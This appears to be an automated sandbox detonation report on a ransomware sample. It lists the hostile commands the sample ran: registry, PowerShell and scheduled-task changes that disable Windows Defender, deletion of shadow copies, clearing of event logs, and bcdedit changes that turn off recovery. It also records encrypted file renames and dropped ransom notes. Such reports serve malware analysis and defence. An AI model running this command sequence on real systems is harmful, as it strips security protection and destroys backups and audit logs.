reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/380-55-0x0000000000000000-mapping.dmp
memory/680-56-0x0000000000000000-mapping.dmp
memory/784-57-0x0000000000000000-mapping.dmp
memory/1704-58-0x0000000000000000-mapping.dmp
memory/620-59-0x0000000000000000-mapping.dmp
memory/572-60-0x0000000000000000-mapping.dmp
memory/1624-61-0x0000000000000000-mapping.dmp
memory/872-62-0x0000000000000000-mapping.dmp
memory/2008-63-0x0000000000000000-mapping.dmp
memory/612-64-0x0000000000000000-mapping.dmp
memory/2016-65-0x0000000000000000-mapping.dmp
memory/1972-66-0x0000000000000000-mapping.dmp
memory/1964-67-0x0000000000000000-mapping.dmp
memory/1260-68-0x0000000000000000-mapping.dmp
memory/2020-69-0x0000000000000000-mapping.dmp
memory/1712-70-0x0000000000000000-mapping.dmp
memory/1136-71-0x0000000000000000-mapping.dmp
memory/1616-72-0x0000000000000000-mapping.dmp
memory/1700-73-0x0000000000000000-mapping.dmp
memory/540-74-0x0000000000000000-mapping.dmp
memory/1788-75-0x0000000000000000-mapping.dmp
memory/1924-76-0x0000000000000000-mapping.dmp
memory/2044-77-0x0000000000000000-mapping.dmp
memory/1768-78-0x0000000000000000-mapping.dmp
memory/1652-79-0x0000000000000000-mapping.dmp
memory/1516-80-0x0000000000000000-mapping.dmp
memory/1604-81-0x0000000000000000-mapping.dmp
memory/592-82-0x0000000000000000-mapping.dmp
memory/1484-83-0x0000000000000000-mapping.dmp
memory/780-84-0x0000000000000000-mapping.dmp
memory/1948-85-0x0000000000000000-mapping.dmp
memory/1540-86-0x0000000000000000-mapping.dmp
memory/1988-87-0x0000000000000000-mapping.dmp
memory/1584-88-0x0000000000000000-mapping.dmp
memory/1560-89-0x0000000000000000-mapping.dmp
memory/892-90-0x0000000000000000-mapping.dmp
memory/1716-91-0x0000000000000000-mapping.dmp
memory/1744-92-0x0000000000000000-mapping.dmp
memory/1472-93-0x0000000000000000-mapping.dmp
memory/912-94-0x0000000000000000-mapping.dmp
memory/1748-95-0x0000000000000000-mapping.dmp
memory/596-96-0x0000000000000000-mapping.dmp
memory/1704-97-0x0000000000000000-mapping.dmp
memory/696-98-0x0000000000000000-mapping.dmp
memory/964-99-0x0000000000000000-mapping.dmp
memory/1588-100-0x0000000000000000-mapping.dmp
memory/1464-101-0x0000000000000000-mapping.dmp
memory/1384-102-0x0000000000000000-mapping.dmp
memory/1764-103-0x0000000000000000-mapping.dmp
memory/1456-104-0x0000000000000000-mapping.dmp
memory/1752-105-0x0000000000000000-mapping.dmp
memory/580-106-0x0000000000000000-mapping.dmp
memory/1064-107-0x0000000000000000-mapping.dmp
memory/1708-108-0x0000000000000000-mapping.dmp
memory/936-109-0x0000000000000000-mapping.dmp
memory/1780-110-0x0000000000000000-mapping.dmp
memory/1648-111-0x0000000000000000-mapping.dmp
memory/268-112-0x0000000000000000-mapping.dmp
memory/1260-113-0x0000000000000000-mapping.dmp
memory/1260-114-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
memory/1932-115-0x0000000000000000-mapping.dmp
memory/1580-117-0x0000000000000000-mapping.dmp
memory/572-119-0x0000000000000000-mapping.dmp
memory/280-120-0x0000000000000000-mapping.dmp
memory/2060-121-0x0000000000000000-mapping.dmp
memory/2156-123-0x000007FEF2FD0000-0x000007FEF3B2D000-memory.dmp
memory/2156-124-0x0000000002460000-0x0000000002462000-memory.dmp
memory/2156-125-0x0000000002462000-0x0000000002464000-memory.dmp
memory/2156-126-0x0000000002464000-0x0000000002467000-memory.dmp
memory/2156-127-0x000000001B760000-0x000000001BA5F000-memory.dmp
memory/2156-128-0x000000000246B000-0x000000000248A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5320851668c91e6c29a32dd7e6eaff3d |
| SHA1 | b4aeed87a44ab583c09e2f8ddc526061be64a915 |
| SHA256 | 84012d4d2718c4739d9d8e44b6c7e4d1bfd77cba733270399487a24b6908e54f |
| SHA512 | 18a91a75f685b4299ad75a10d534cca20ae096a1dcdc005afa50d238671cec95dea3fc610589e24dba7a7e91bd848ba6830f855caf7208418faadf2626651fab |
memory/2248-131-0x000007FEF2630000-0x000007FEF318D000-memory.dmp
memory/2248-132-0x000000001B8E0000-0x000000001BBDF000-memory.dmp
memory/2248-136-0x000000000235B000-0x000000000237A000-memory.dmp
memory/2248-135-0x0000000002354000-0x0000000002357000-memory.dmp
memory/2248-134-0x0000000002352000-0x0000000002354000-memory.dmp
memory/2248-133-0x0000000002350000-0x0000000002352000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:15
Reported
2022-01-13 13:20
Platform
win10-en-20211208
Max time kernel
289s
Max time network
130s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\UseWait.crw => C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupSuspend.png => C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointComplete.crw => C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeProtect.crw => C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AddRename.tif => C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSAN.TTF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Y1GsQV_cY6E0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\MusicStoreLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\de-DE.PhoneNumber.model | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_MgKNg1AaXwo0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_QgIUCkSihqU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_K_rMK21o79s0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_oiENgAPckLA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\auw1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5fCUf-ud1rw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Fonts\PplMDL2.1.69.ttf | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_WJSZIzruWLc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Stripes\NewCollection.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_tAIMHVI0aH80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\152.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\shake.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-125.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yoQWcHNCJ3c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_A_QgvbPrkFM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UDM3wmGVyaw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_J4pmeqDADjA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\11.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PkTd1_LeDyI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_dg9IXi3igwQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_XGYOS4ofS8o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\bigsmile.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O2cnd3eq5Og0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_TatpvflUFuU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\auw1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
